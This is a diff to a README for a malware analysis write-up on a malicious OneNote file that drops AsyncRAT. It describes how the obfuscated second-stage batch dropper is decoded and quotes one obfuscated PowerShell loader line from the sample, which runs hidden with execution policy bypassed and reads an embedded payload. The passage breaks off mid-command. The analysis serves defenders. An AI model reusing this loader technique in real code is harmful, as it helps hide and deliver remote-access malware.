RanjitPatil/Malicious-OneNote-AsyncRAT-Analysis/README.md

 remnux@remnux:~/Downloads$
 ```

 ## Second Stage Payload

 - System32.bat file is obfuscated, Lot of environment variables are created and concatenated to build commands.
 If it's difficult to read, it's easy to deobfuscate.

-Just add a "echo" at the beginning of all lines at the bottom of the file and execute it or you can use Procmon tool to PowerShell executed command.
+- Just add a "echo" at the beginning of all lines at the bottom of the file and execute it or you can use Procmon tool to PowerShell executed command.

 ![image](https://user-images.githubusercontent.com/43460691/216255585-757086c3-90c7-40c2-88ed-97b47c3df79d.png)

+- Capture the process ecexution using Procmon, If you open the process start operation you can see the deobfuscated command.

 ![image](https://user-images.githubusercontent.com/43460691/216255614-c01cdf36-c1db-4a3d-a6a0-74900ae66888.png)

 - This script is a dropper.
-The payload is located in the file and read by PowerShell.
-It is identified by lines starting with ":: ".
+You can see base64 encoded payload is located in the file and read by PowerShell.
+Payload is identified by lines starting with **":: ".**

 ```
 "system32.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $eIfqq = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\admin\AppData\Local\Temp\system32.bat').Split([Environment]::NewLine)